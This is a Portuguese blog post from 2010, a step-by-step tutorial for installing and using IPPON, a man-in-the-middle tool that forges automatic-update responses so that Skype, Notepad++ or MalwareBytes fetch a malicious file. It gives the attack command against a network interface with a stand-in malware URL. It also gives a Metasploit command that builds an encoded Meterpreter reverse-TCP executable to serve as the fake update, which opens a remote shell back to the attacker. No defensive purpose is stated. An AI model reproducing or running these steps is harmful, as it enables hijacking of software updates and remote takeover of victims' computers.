quinta-feira, 7 de outubro de 2010

IPPON - injeta falsas respostas de atualização de softwares

Neste post vou mostrar como instalar e utilizar o IPPON, ferramenta apresentada pela primeira vez no DEFCON17, que compromete mecanismos de atualização automática usada por aplicativos. Ele simula a necessidade de atualizar o aplicativo com um novo arquivo no repositório, porém este arquivo pode ser um vírus, rootkit etc.

Primeiramente baixe a ferramenta no site oficial http://code.google.com/p/ippon-mitm/ ela vem “zipada”, utilize o comando abaixo para descompactar o pacote:

# unzip IPPON_dc17.zip

Como esta ferramenta é escrita em Python, é lógico que você precisa ter o python instalado em sua máquina, mas isso vem por padrão na maioria das distribuições Linux.
Agora vamos instalar os pacotes necessários para o funcionamento do IPPON. Primeiro vamos instalar o SCAPY com o comando abaixo:

# aptitude search python-scapy

Precisamos do servidor Ubigraph, que infelizmente não veio no repositório do Ubuntu 9.04, mas a instalação é tranqüila. Entre no site oficial do Ubigraph e baixe o pacote conforme sua distro e plataforma e em seguida o site vai te direcionar para uma pagina que mostrará como descompactar, instalar e executar o Ubigraph.

Site para download: http://www.ubietylab.net/ubigraph/content/Downloads/index.php
Redirecionado: http://ubietylab.net/ubigraph/content/Downloads/index.php

Siga os passos que esta em Redirecionado e pronto tudo esta funcionando, agora vamos ver como usar o IPPON, mas antes copie o arquivo ippon.py para dentro do diretório “examples/Python”do Ubigraph com o comando abaixo:

# cp ../ippon.py examples/Python/

Obs: este comando só vai funcionar se você executá-lo de dentro do diretório Ubigraph e levando em consideração que o mesmo esteja dentro do diretório Ippon.

Executando o ippon pela primeira vez:
# python examples/Python/ippon.py

Usage: ippon.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v, --verbose bring the noise
Connectivity:
-i INTERFACE, --input-interface=INTERFACE
Interface to read packets from
-o INTERFACE, --output-interface=INTERFACE
Interface to write packets to
-l, --list-interfaces
List all available Interfaces
-w, --wireless-mode
Interface is wireless
Spicing:
-u URL, --mailicious-url=URL
Mailicious URL
Output:
-3, --3d-topology Live network topology in 3D

O arquivo targets.xml vem com o ippon, ele contém os programas alvo do ataque. Atualmente temos 3 alvos por padrão: MalwareBytes, Skype e Notepad++. Para iniciar um ataque basta executar o comando abaixo:

# ./ippon.py -i eth0 targets.xml -v -u http://linkparaomalware.com

Podemos criar um payload com o metasploit e copiar o arquivo para o nosso servidor web (http://linkparaomalware.com), assim quando o arquivo for carregado fará uma conexão reversa com o nosso metasploit. Um bom exemplo disso seria o comando abaixo no metasploit:

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP_SUA_MAQUINA LPORT=8080 8080 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o nome_do_arquivo.exe

Agora é só esperar um dos 3 programas se atualizar.

By Osvaldo

Nenhum comentário:

Postar um comentário